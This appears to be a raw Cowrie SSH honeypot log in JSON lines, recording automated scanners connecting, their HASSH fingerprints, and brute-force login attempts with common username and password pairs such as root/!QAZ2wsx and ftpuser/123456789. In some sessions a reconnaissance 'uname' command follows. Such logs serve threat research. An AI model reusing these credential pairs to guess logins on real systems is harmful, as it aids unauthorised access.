{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:00:20.195568Z","src_ip":"212.227.235.229","session":"34b6145bf434"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":55766,"dst_ip":"1.2.3.4","dst_port":22,"session":"47385fec8107","protocol":"ssh","message":"New connection: 41.226.27.251:55766 (1.2.3.4:22) [session: 47385fec8107]","sensor":"my-vps","timestamp":"2025-08-31T03:00:20.455200Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:00:20.456106Z","src_ip":"41.226.27.251","session":"47385fec8107"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:00:20.500889Z","src_ip":"41.226.27.251","session":"47385fec8107"}
{"eventid":"cowrie.login.failed","username":"default","password":"1","message":"login attempt [default/1] failed","sensor":"my-vps","timestamp":"2025-08-31T03:00:20.637292Z","src_ip":"41.226.27.251","session":"47385fec8107"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:00:21.993013Z","src_ip":"41.226.27.251","session":"47385fec8107"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"123456789","message":"login attempt [ftpuser/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T03:00:26.068892Z","src_ip":"212.227.235.229","session":"34b6145bf434"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:00:26.715605Z","src_ip":"212.227.235.229","session":"e1f4a87048bb"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:00:26.716326Z","src_ip":"212.227.235.229","session":"e1f4a87048bb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51008,"dst_ip":"1.2.3.4","dst_port":22,"session":"88ddddad4d74","protocol":"ssh","message":"New connection: 212.227.125.160:51008 (1.2.3.4:22) [session: 88ddddad4d74]","sensor":"my-vps","timestamp":"2025-08-31T03:00:26.758049Z"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:00:27.944938Z","src_ip":"212.227.235.229","session":"34b6145bf434"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52364,"dst_ip":"1.2.3.4","dst_port":22,"session":"13f0f59298e7","protocol":"ssh","message":"New connection: 212.227.235.229:52364 (1.2.3.4:22) [session: 13f0f59298e7]","sensor":"my-vps","timestamp":"2025-08-31T03:00:28.502533Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:00:28.503515Z","src_ip":"212.227.235.229","session":"13f0f59298e7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:00:28.754045Z","src_ip":"212.227.235.229","session":"13f0f59298e7"}
{"eventid":"cowrie.login.success","username":"root","password":"!QAZ2wsx","message":"login attempt [root/!QAZ2wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:00:29.507921Z","src_ip":"212.227.235.229","session":"13f0f59298e7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:00:30.025294Z","src_ip":"212.227.235.229","session":"13f0f59298e7"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:00:30.026197Z","src_ip":"212.227.235.229","session":"13f0f59298e7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:00:30.278318Z","src_ip":"212.227.235.229","session":"13f0f59298e7"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:00:30.279500Z","src_ip":"212.227.235.229","session":"13f0f59298e7"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:00:33.862180Z","src_ip":"212.227.125.160","session":"88ddddad4d74"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:00:33.862947Z","src_ip":"212.227.125.160","session":"88ddddad4d74"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"7.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 7.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:00:33.873933Z","src_ip":"212.227.235.229","session":"e1f4a87048bb"}
{"eventid":"cowrie.session.closed","duration":"127.9","message":"Connection lost after 127.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:00:33.875047Z","src_ip":"212.227.235.229","session":"e1f4a87048bb"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":39350,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d2aef93a5ee","protocol":"ssh","message":"New connection: 41.226.27.251:39350 (1.2.3.4:22) [session: 2d2aef93a5ee]","sensor":"my-vps","timestamp":"2025-08-31T03:00:40.840182Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:00:40.841097Z","src_ip":"41.226.27.251","session":"2d2aef93a5ee"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:00:40.889203Z","src_ip":"41.226.27.251","session":"2d2aef93a5ee"}
{"eventid":"cowrie.login.failed","username":"tomcat","password":"tomcat","message":"login attempt [tomcat/tomcat] failed","sensor":"my-vps","timestamp":"2025-08-31T03:00:41.021832Z","src_ip":"41.226.27.251","session":"2d2aef93a5ee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55680,"dst_ip":"1.2.3.4","dst_port":22,"session":"95c053a0212b","protocol":"ssh","message":"New connection: 212.227.125.160:55680 (1.2.3.4:22) [session: 95c053a0212b]","sensor":"my-vps","timestamp":"2025-08-31T03:00:41.512914Z"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:00:42.207382Z","src_ip":"41.226.27.251","session":"2d2aef93a5ee"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:00:42.221146Z","src_ip":"212.227.125.160","session":"95c053a0212b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:00:42.222018Z","src_ip":"212.227.125.160","session":"95c053a0212b"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssword","message":"login attempt [root/P@ssword] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:00:43.686407Z","src_ip":"212.227.235.229","session":"aff03313aa73"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"123456789","message":"login attempt [ftpuser/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T03:00:44.519300Z","src_ip":"212.227.125.160","session":"95c053a0212b"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:00:46.085035Z","src_ip":"212.227.125.160","session":"95c053a0212b"}
{"eventid":"cowrie.login.failed","username":"user1","password":"123456","message":"login attempt [user1/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:00:50.135234Z","src_ip":"212.227.125.160","session":"88ddddad4d74"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34134,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed3c85738583","protocol":"ssh","message":"New connection: 212.227.235.229:34134 (1.2.3.4:22) [session: ed3c85738583]","sensor":"my-vps","timestamp":"2025-08-31T03:00:52.106924Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58660,"dst_ip":"1.2.3.4","dst_port":22,"session":"801be269525e","protocol":"ssh","message":"New connection: 212.227.125.160:58660 (1.2.3.4:22) [session: 801be269525e]","sensor":"my-vps","timestamp":"2025-08-31T03:00:53.340166Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:00:53.340985Z","src_ip":"212.227.125.160","session":"801be269525e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42548,"dst_ip":"1.2.3.4","dst_port":22,"session":"003737b74dc2","protocol":"ssh","message":"New connection: 212.227.235.229:42548 (1.2.3.4:22) [session: 003737b74dc2]","sensor":"my-vps","timestamp":"2025-08-31T03:00:53.558510Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:00:53.559538Z","src_ip":"212.227.235.229","session":"003737b74dc2"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-31T03:00:53.628705Z","src_ip":"212.227.125.160","session":"801be269525e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:00:54.121906Z","src_ip":"212.227.235.229","session":"aff03313aa73"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:00:54.122627Z","src_ip":"212.227.235.229","session":"aff03313aa73"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:00:54.124243Z","src_ip":"212.227.235.229","session":"003737b74dc2"}
{"eventid":"cowrie.session.closed","duration":"28.0","message":"Connection lost after 28.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:00:54.753501Z","src_ip":"212.227.125.160","session":"88ddddad4d74"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"123456","message":"login attempt [hadoop/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:00:54.887531Z","src_ip":"212.227.235.229","session":"003737b74dc2"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:00:56.139610Z","src_ip":"212.227.235.229","session":"003737b74dc2"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:00:56.410847Z","src_ip":"212.227.235.229","session":"ed3c85738583"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:00:56.413925Z","src_ip":"212.227.235.229","session":"ed3c85738583"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"6.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 6.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:01:00.166244Z","src_ip":"212.227.235.229","session":"aff03313aa73"}
{"eventid":"cowrie.session.closed","duration":"95.5","message":"Connection lost after 95.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:01:00.170800Z","src_ip":"212.227.235.229","session":"aff03313aa73"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":52322,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ad90c0599df","protocol":"ssh","message":"New connection: 41.226.27.251:52322 (1.2.3.4:22) [session: 7ad90c0599df]","sensor":"my-vps","timestamp":"2025-08-31T03:01:01.242930Z"}
